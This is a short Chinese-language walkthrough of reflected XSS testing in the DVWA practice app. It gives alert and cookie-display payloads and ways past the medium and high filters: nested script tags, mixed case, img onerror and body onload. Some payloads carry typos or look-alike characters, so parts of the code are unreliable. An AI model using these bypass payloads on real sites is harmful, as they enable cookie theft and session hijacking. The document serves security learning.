xss(跨站脚本攻击)是一种常见的Web应用程序安全漏洞,它允许攻击者在网页中嵌入恶意脚本代码,通常是JavaScript,当用户浏览这些网页时,嵌入的代码会在用户的浏览器上执行,从而达到攻击者的目的.
一,反射型xss(初级)
在DVWA-master里面点击xss(reflect)
1.执行<script>alert(/xss/)</script>会出现弹框,有xss漏洞
2.查看当前的cookie
<script>alert(document.cookie)</script>
二,反射型xss(中级)
切换到安全级别中级,查看源代码,会发现会直接过滤掉<script>,所以要想办法绕过它,可以用双写绕过或者是大小写混淆绕过
1.双写绕过
(1)<sc<script>ript>alert(/xss/)</script> 执行出现谈话框
(2)获取当前页面cookie
<sc<script>ript>alert(document.cookie)</script>
2.大小写混淆绕过
(1)<ScriPt>alert(/xss/)</script>
(2)获取当前页面cookie
<ScriPt>alert(document.cookie)</script>
三,反射型xss(高级)
查看源程序发现对<script>进行了替换,不能用常规的方法绕过它,可以用其他语句如img标签和body标签
1.使用标签img
(1)<img scr=1 οnerrοr=alter(/xss/)>
(2)查看当前的cookie
<img src=1 οnerrοr=alert(document.cookie)>
2.用body标签
(1)<body οnlοad=alert(/xss/)>
(2)查看当前的cookie
<body οnlοad=alert(document.cookie)>
中高级主要是想办法去绕过